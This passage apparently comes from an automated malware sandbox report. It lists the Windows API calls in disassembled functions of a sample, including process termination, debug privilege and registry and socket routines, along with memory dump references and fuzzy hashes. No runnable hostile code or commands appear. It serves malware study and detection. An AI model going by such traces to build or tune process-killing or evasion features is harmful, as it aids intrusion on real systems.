                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0069DB6E
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0069DB95
                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0063A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0069DBA0
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0069DBBD
                                                                    • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0063A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0069DBC8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                    • String ID:
                                                                    • API String ID: 1268354404-0
                                                                    • Opcode ID: 910b09f554adbc5cc8d2871835b7cab25b8608c860ff261d1f1352c02c1645fb
                                                                    • Instruction ID: 68c6db9eaf148c42e875bebe62b8d3c745e0194f8b44579e1378bd15e9e991fe
                                                                    • Opcode Fuzzy Hash: 910b09f554adbc5cc8d2871835b7cab25b8608c860ff261d1f1352c02c1645fb
                                                                    • Instruction Fuzzy Hash: 71515B74600309EFDF24DF68CC91FAA77FAAB49754F100529F9869B690D770AD80EB90
                                                                    APIs
                                                                      • Part of subcall function 00666EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00665FA6,?), ref: 00666ED8
                                                                      • Part of subcall function 00666EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00665FA6,?), ref: 00666EF1
                                                                      • Part of subcall function 006672CB: GetFileAttributesW.KERNEL32(?,00666019), ref: 006672CC
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 006675CA
                                                                    • _wcscmp.LIBCMT ref: 006675E2
                                                                    • MoveFileW.KERNEL32(?,?), ref: 006675FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 793581249-0
                                                                    • Opcode ID: 4df10ae2ceebf14dc1b06d2ad6bd7eb99cad079737a9c4a253bfa1de6ff1924d
                                                                    • Instruction ID: 1f4a9655b5a934afb0d7037f6625f93b212d891604ad5c1ae2bd610e8309c042
                                                                    • Opcode Fuzzy Hash: 4df10ae2ceebf14dc1b06d2ad6bd7eb99cad079737a9c4a253bfa1de6ff1924d
                                                                    • Instruction Fuzzy Hash: 6D511FB2A092299ADF94EB94D881DDE73BE9F08314F1040AEF609E3541EA74D7C5CF64
                                                                    APIs
                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0069DAD1,00000004,00000000,00000000), ref: 0063EAEB
                                                                    • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0069DAD1,00000004,00000000,00000000), ref: 0063EB32
                                                                    • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0069DAD1,00000004,00000000,00000000), ref: 0069DC86
                                                                    • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0069DAD1,00000004,00000000,00000000), ref: 0069DCF2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: b5f074e52ed5f95ac0c3addd6a4d2fb1a438fc8d898552d8837696e9be735e58
                                                                    • Instruction ID: d51b069c66a84c8bbd787cd5e48dd49c4f7a3acf5d95666e25432300d45e7199
                                                                    • Opcode Fuzzy Hash: b5f074e52ed5f95ac0c3addd6a4d2fb1a438fc8d898552d8837696e9be735e58
                                                                    • Instruction Fuzzy Hash: 2941D870605680DBDF3A5B288F8DABABA9FAB52304F19141DE04746AE1C772BC41D7B1
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0065AEF1,00000B00,?,?), ref: 0065B26C
                                                                    • HeapAlloc.KERNEL32(00000000,?,0065AEF1,00000B00,?,?), ref: 0065B273
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0065AEF1,00000B00,?,?), ref: 0065B288
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,0065AEF1,00000B00,?,?), ref: 0065B290
                                                                    • DuplicateHandle.KERNEL32(00000000,?,0065AEF1,00000B00,?,?), ref: 0065B293
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0065AEF1,00000B00,?,?), ref: 0065B2A3
                                                                    • GetCurrentProcess.KERNEL32(0065AEF1,00000000,?,0065AEF1,00000B00,?,?), ref: 0065B2AB
                                                                    • DuplicateHandle.KERNEL32(00000000,?,0065AEF1,00000B00,?,?), ref: 0065B2AE
                                                                    • CreateThread.KERNEL32(00000000,00000000,0065B2D4,00000000,00000000,00000000), ref: 0065B2C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: f2f64545ff0b39e9e7c8a584f29f6aae231f52343fc1a32e9536f3b35066cdae
                                                                    • Instruction ID: b3b882c8758f9bf40121687acb16196ed68245cc5d363feb9414ebcab35ab1e3
                                                                    • Opcode Fuzzy Hash: f2f64545ff0b39e9e7c8a584f29f6aae231f52343fc1a32e9536f3b35066cdae
                                                                    • Instruction Fuzzy Hash: 5701BBB5240304BFEB10BBA5DC49F6B7BADEB8A711F019411FA06DB5A1CA75AC00CF61
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: 032cc593d13c172a0cbf5b3dd4f695543ac4c9f6a618df9582e41877bc2e05bd
                                                                    • Instruction ID: dac89c7f0983e1778700d015fe77cb42830d3f70e24165e50df80d59c560d7ce
                                                                    • Opcode Fuzzy Hash: 032cc593d13c172a0cbf5b3dd4f695543ac4c9f6a618df9582e41877bc2e05bd
                                                                    • Instruction Fuzzy Hash: D1E19371A00219ABDF14DFA4D891AEE77BBEF48324F14812DF909AB381D770AD45CB94
                                                                    APIs
                                                                      • Part of subcall function 0062936C: __swprintf.LIBCMT ref: 006293AB
                                                                      • Part of subcall function 0062936C: __itow.LIBCMT ref: 006293DF
                                                                      • Part of subcall function 0063C6F4: _wcscpy.LIBCMT ref: 0063C717
                                                                    • _wcstok.LIBCMT ref: 0067184E
                                                                    • _wcscpy.LIBCMT ref: 006718DD
                                                                    • _memset.LIBCMT ref: 00671910
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                    • String ID: X$p2ml2m
                                                                    • API String ID: 774024439-1579325628
                                                                    • Opcode ID: 029c53fc8b39ce23f32c93a5fc766617c7bdf32ef109001e80ea5cc90674551d
                                                                    • Instruction ID: d34e1d680e157e9f63eebc0b1e9347fd986ac90edcddf792c89f9d75e9364bf8
                                                                    • Opcode Fuzzy Hash: 029c53fc8b39ce23f32c93a5fc766617c7bdf32ef109001e80ea5cc90674551d
                                                                    • Instruction Fuzzy Hash: BFC191305047519FC764EF28D891A9AB7E2BF85350F00892EF9899B3A1DB30ED05CF86
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: Q\E$[$\$\$]$^
                                                                    • API String ID: 2102423945-1026548749
                                                                    • Opcode ID: 78de932c79a87264b310a9088af48c10cb1da59e5da323074149df02d6cbee0a
                                                                    • Instruction ID: 751f428f04229c2c1abac70e070adf5b2bc4b9c472a639ba29b0d71b45d0661b
                                                                    • Opcode Fuzzy Hash: 78de932c79a87264b310a9088af48c10cb1da59e5da323074149df02d6cbee0a
                                                                    • Instruction Fuzzy Hash: 1F519B71E016299FCF24CF98D881AEDB7B7AF94304F29816AD814B7351E7309D858F91
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00689B19
                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00689B2D
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00689B47
                                                                    • _wcscat.LIBCMT ref: 00689BA2
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00689BB9
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00689BE7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat
                                                                    • String ID: SysListView32
                                                                    • API String ID: 307300125-78025650
                                                                    • Opcode ID: 48732b6e4d3629b0daf715c36eb7a89576948e240c126974fa9eaad78ec7456f
                                                                    • Instruction ID: fd3b5513513e42d570ae27f22ce2d3061b7b877d0a39fe0674242a9adc9a1f89
                                                                    • Opcode Fuzzy Hash: 48732b6e4d3629b0daf715c36eb7a89576948e240c126974fa9eaad78ec7456f
                                                                    • Instruction Fuzzy Hash: 6641C270900308AFDB21AFA4CC85BEE77BAEF08350F14052AF549A7291D7719D85CB64
                                                                    APIs
                                                                      • Part of subcall function 00666532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00666554
                                                                      • Part of subcall function 00666532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00666564
                                                                      • Part of subcall function 00666532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 006665F9
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0068179A
                                                                    • GetLastError.KERNEL32 ref: 006817AD
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006817D9
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00681855
                                                                    • GetLastError.KERNEL32(00000000), ref: 00681860
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00681895
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: d70b6a8ff1445e4e2ceadac4517d9b327c348e35e4cdaa694edf57aec03b4435
                                                                    • Instruction ID: 55067d04b127318b73fe1dabf699c220c2129b5f4e6a66af693de16863678120
                                                                    • Opcode Fuzzy Hash: d70b6a8ff1445e4e2ceadac4517d9b327c348e35e4cdaa694edf57aec03b4435
                                                                    • Instruction Fuzzy Hash: 4441A8B1600201AFDB45FF54C9A6FADB7ABAF45310F04905CF9069F382DB78A9068F95
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 006658B8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: fdcefa87bdb00a951722acf6387d377a3793cfcf7f49d4fb5d1e57ca472ec4a6
                                                                    • Instruction ID: 4f65e4923f490320b6789bd7ed6068fda02575438f033e39612c4b3af5ab9208
                                                                    • Opcode Fuzzy Hash: fdcefa87bdb00a951722acf6387d377a3793cfcf7f49d4fb5d1e57ca472ec4a6
                                                                    • Instruction Fuzzy Hash: 1311EB35609B72BAE7155B549C83DAA279F9F15310F30003FFA02A7781E770AA004A69
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0066A806
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafeVartype
                                                                    • String ID:
                                                                    • API String ID: 1725837607-0
                                                                    • Opcode ID: 98c02a165b4f11cfb458f45eb33ece48a39c95c1a814a9b281e0e8bcf091cce0
                                                                    • Instruction ID: a68c3b2dd28f4f55aa2c473550a3b13d7b2f5809ede7a2985a773240439efa68
                                                                    • Opcode Fuzzy Hash: 98c02a165b4f11cfb458f45eb33ece48a39c95c1a814a9b281e0e8bcf091cce0
                                                                    • Instruction Fuzzy Hash: 04C15775A0421A9FDB00DFD8C481BAEB7F6EF09315F20406AE606E7341D734AA42CFA5
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00666B63
                                                                    • LoadStringW.USER32(00000000), ref: 00666B6A
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00666B80
                                                                    • LoadStringW.USER32(00000000), ref: 00666B87
                                                                    • _wprintf.LIBCMT ref: 00666BAD
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00666BCB
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00666BA8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 3648134473-3128320259
                                                                    • Opcode ID: e7b9e3f3f2c711abc952f65901267a5e20260a91d0695c5f7ec473a7509ea495
                                                                    • Instruction ID: 7aa42d7146fa83220af6c0e853a999843a00bbc60ca5be3bd7dc02ae407c944d
                                                                    • Opcode Fuzzy Hash: e7b9e3f3f2c711abc952f65901267a5e20260a91d0695c5f7ec473a7509ea495
                                                                    • Instruction Fuzzy Hash: 800181F2900208BFEB11BBA4DD89EF7376DDB09304F0044A1B746E6141EA74AE848F70
                                                                    APIs
                                                                      • Part of subcall function 00683C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00682BB5,?,?), ref: 00683C1D
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00682BF6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharConnectRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 2595220575-0
                                                                    • Opcode ID: d7be4ad93ac9902b841c500b92e3c16bc809293385cfae6166d87ca30d0c45f0
                                                                    • Instruction ID: 568186da8834bebbac179ee5bfbe83608deb0e70ec0c8411e82ec3196ca00b42
                                                                    • Opcode Fuzzy Hash: d7be4ad93ac9902b841c500b92e3c16bc809293385cfae6166d87ca30d0c45f0
                                                                    • Instruction Fuzzy Hash: F3916A712042129FCB40EF54C8A1B6EBBE6FF88314F04895DF996972A2DB34E945CF46
                                                                    APIs
                                                                    • select.WSOCK32 ref: 00679691
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0067969E
                                                                    • __WSAFDIsSet.WSOCK32(00000000,?), ref: 006796C8
                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006796E9
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006796F8
                                                                    • htons.WSOCK32(?), ref: 006797AA
                                                                    • inet_ntoa.WSOCK32(?), ref: 00679765
                                                                      • Part of subcall function 0065D2FF: _strlen.LIBCMT ref: 0065D309
                                                                    • _strlen.LIBCMT ref: 00679800
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                    • String ID:
                                                                    • API String ID: 3480843537-0
                                                                    • Opcode ID: d7e7f32f66efc814e48b8041f77622aab14526016766e5cd47be2fec6173a8f0
                                                                    • Instruction ID: 27b74ac8df34b857bcf7fba3496cfddd13449b3d31f15c8f1d47718d2df20cef
                                                                    • Opcode Fuzzy Hash: d7e7f32f66efc814e48b8041f77622aab14526016766e5cd47be2fec6173a8f0
                                                                    • Instruction Fuzzy Hash: C081E331504240ABC754EF64DC85EAFB7EAEF85710F108A1DF55A9B291EB30ED04CBA6
                                                                    APIs
                                                                    • __mtinitlocknum.LIBCMT ref: 0064A991
                                                                      • Part of subcall function 00647D7C: __FF_MSGBANNER.LIBCMT ref: 00647D91
                                                                      • Part of subcall function 00647D7C: __NMSG_WRITE.LIBCMT ref: 00647D98
                                                                      • Part of subcall function 00647D7C: __malloc_crt.LIBCMT ref: 00647DB8
                                                                    • __lock.LIBCMT ref: 0064A9A4
                                                                    • __lock.LIBCMT ref: 0064A9F0
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,006D6DE0,00000018,00655E7B,?,00000000,00000109), ref: 0064AA0C
                                                                    • EnterCriticalSection.KERNEL32(8000000C,006D6DE0,00000018,00655E7B,?,00000000,00000109), ref: 0064AA29
                                                                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 0064AA39
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 1422805418-0
                                                                    • Opcode ID: 33318e0d3f499d3b059eca54510448181b5394d290e9561f73e7da0183d5b5f9
                                                                    • Instruction ID: ae88b7f6f2df1af99e766facc7bc04044ece9799091788fac596e9e9f7c7c45c
                                                                    • Opcode Fuzzy Hash: 33318e0d3f499d3b059eca54510448181b5394d290e9561f73e7da0183d5b5f9
                                                                    • Instruction Fuzzy Hash: FE412871A40301BBEB10DFE8DA8479CB7A3AF05325F10821CE425AB2D2D7B49D81CB86
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00688EE4
                                                                    • GetDC.USER32(00000000), ref: 00688EEC
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00688EF7
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00688F03
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00688F3F
